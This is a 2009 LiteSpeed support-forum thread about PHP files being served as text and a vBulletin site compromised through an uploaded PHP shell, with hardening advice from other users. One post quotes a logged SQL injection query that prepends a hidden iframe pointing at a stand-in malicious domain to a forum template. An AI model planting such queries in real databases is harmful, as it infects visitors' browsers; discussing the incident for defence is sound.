Urgent security issue - php files are downloaded as text

Discussion in 'General' started by LiteSpeeder, Oct 6, 2009.

  1. LiteSpeeder

    LiteSpeeder Well-Known Member

    For the last few weeks i've re-uploaded some of my php files several times to fix this problem. When a php file is requested too many times the server stops processing it as php and downloads/displays as text. Please respond asap.
  2. mistwang

    mistwang LiteSpeed Staff

    Should be addressed in our 4.0.11 release soon.
  3. LiteSpeeder

    LiteSpeeder Well-Known Member

    Ok, i hope no important php files are displayed as text (like config.php) till you release the new version.
  4. PSS

    PSS Well-Known Member

    Thanks. I did report one other cause for this (configuration notice). I hope you ensure that in no circumstances PHP files are displayed as text, unless .php MIME type is changed (i.e. someone want specifically to display php as text).
  5. MikeDVB

    MikeDVB Well-Known Member

    When I saw this happen it was sending the output of the PHP file (and not the actual source) as a down-loadable file which wouldn't be a security issue but a nuisance. That is unless my memory is failing me!

    Can you verify that it is actually sending the *source* of the file and not just the output?
  6. PSS

    PSS Well-Known Member

  7. MikeDVB

    MikeDVB Well-Known Member

    I guess I could understand how the two are related, once the server runs out of available processors for PHP it doesn't process it and just sends the contents of the file as though it were HTML...

    At any rate, realistically LSWS should have some sort of warning about this or in some way prevent it as it is a huge security issue especially if somebody goes to your config.php and holds down F5 on a few machines, they're bound to get the "download config.php" eventually.
  8. anewday

    anewday Moderator

    Does this occur on 4.0.6 ? George, we need this asap. :)
    Last edited: Oct 7, 2009
  9. bhanuprasad1981

    bhanuprasad1981 Well-Known Member

    randomly my users complain they get blank pages :(
  10. mistwang

    mistwang LiteSpeed Staff

    No. it does not.
  11. anewday

    anewday Moderator

    Ok, could you update us on the progress of 4.0.11?
  12. mistwang

    mistwang LiteSpeed Staff

    All packages for 4.0.11 has been uploaded, any one interested in helping us testing the new release, you can download by changing the version number in the download link to 4.0.11. Will update the the download page after get some positive feedbacks.
  13. LiteSpeeder

    LiteSpeeder Well-Known Member

    I've been suffering from an iframe attack for 10 days. My site is a mainly vBulletin site and a few addons. This is not a typical iframe injection to php files and i've already followed every iframe cleaning, iframe protection related suggestions (including formatting my pc, scanning my servers, changing password and restoring backups)

    I've also disabled custom addons-script. But somehow, the hacker (or it may still be a virus) can add iframes to my templates.

    The iframe is being injected via sql queries. Sample code from my mysql logs:

    16905 Query       UPDATE template SET template=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template), template_un=concat('<iframe width=1 height=1 border=0 frameborder=0 src=\\"evil_domain\\"></iframe>', template_un) where title='header'
    Now another big forum site is infected, too. I'm not alone. AND YES, THEY ARE USING LITESPEED like me!

    This is the only way i can slowdown or stop the hacker-virus for a while:
    -I remove the old database user from my database.
    -I create a new database user.
    -I edit my config.php and upload to server.

    This way it doesn't add iframe to my header template for a few hours.. but then the same thing happens :(

    Here's my theory: They can view my config.php as text and retrieve my database password from there.

    There are no traces in access logs or there are none edited/updated php files. I guess they're simply having database access as i told above and they can easily execute queries.

    Please help ASAP! :(
  14. LiteSpeeder

    LiteSpeeder Well-Known Member

    Another issue with litespeed:

    .htaccess in my includes folder:
    <Files config.php>
    order deny,allow
    deny from all
    HTTP Status Code: HTTP/1.0 403 Forbidden with APACHE
    HTTP Status Code: HTTP/1.0 200 OK with LITESPEED

    Now i've switched to Apache to be sure the vulnerability is lsws.
  15. mistwang

    mistwang LiteSpeed Staff

    Maybe the hacker uploaded a PHP shell, which allows the hacker to access any PHP code.
    It is hard to say, but, looks like it is PHP code related issue. Have you upgrade vB to the latest release?
    Yeah, please keep us updated on this issue.
  16. LiteSpeeder

    LiteSpeeder Well-Known Member

    Yeah, mine and the other guys' vbulletin code is up to date. Apache's been running my website for a few hours. I'll keep you updated.
  17. PSS

    PSS Well-Known Member

    Is you mysql server remote or local? If local, add


    to my.cnf's [mysqld] section.

    Use phpmyadmin to check forum mysql user privileges, make sure that they can only access from localhost, and with password.

    Change your vbulletin admin folder name.

    Shut down ssh.

    Rename wget.

    Add that malicious domain name to LSWS to THE_REQUEST/POST_PAYLOAD Request Filtering Rules.

    To make template database (FORUM_template) read-only, see http://www.linuxtopia.org/online_bo..._5.1_database_reference_guide/myisampack.html

    You do not give any info what kind of system you run, is it shared/VPS or dedicated server, if you use Ensim, Cpanel or not, if you have NFS or other remote access to other servers etc. Building a secure system is not simple, but the keyword is "simplify".

    I run Litespeed and a very large forum. I have SSH and FTP closed, I use private network, VPN and SSH2 (opened only for that 10 seconds when I log in) for communication with servers, my CP is Webmin, I use no vbulletin plugins or mods and database is only accessible from localhost. Simple and effective, fast, secure so far :)
    Last edited: Nov 14, 2009
  18. LiteSpeeder

    LiteSpeeder Well-Known Member

    Yes, you were right!

    They uploaded a PHP shell to my /forum/customprofilepics/ (chmod 777) as profilepic632436_2.php (12 days ago!!)

    Can you please tell me how to stop these shells to be uploaded and even they are uploaded, restricting their functions?

    I've uploaded the shell.

    Attached Files:

    Last edited: Nov 16, 2009
  19. mistwang

    mistwang LiteSpeed Staff

    Just strengthen the file/directory permission of your web site, the hacker is likely used a security hole in PHP to upload the script, PHP is running as the global user or site owner (SuEXEC) mode, so, make majority of your site owned by "root" and only writable by root will stop it.
  20. LiteSpeeder

    LiteSpeeder Well-Known Member

    Unfortunately some vbulletin directories (customavatars, customprofilepics) should be chmod 777. So i put htaccess files there including the lines below:
    Options -Indexes
    Options -ExecCGI
    AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .html .shtml .sh .cgi 
    <Files ^(*.jpeg|*.jpg|*.png|*.gif)>
    order deny,allow
    deny from all
    But i'm not sure if litespeed support these kind of .htaccess rules. How can i test this?

    And please reply my other post, too http://www.litespeedtech.com/support/forum/showpost.php?p=17442&postcount=14

Share This Page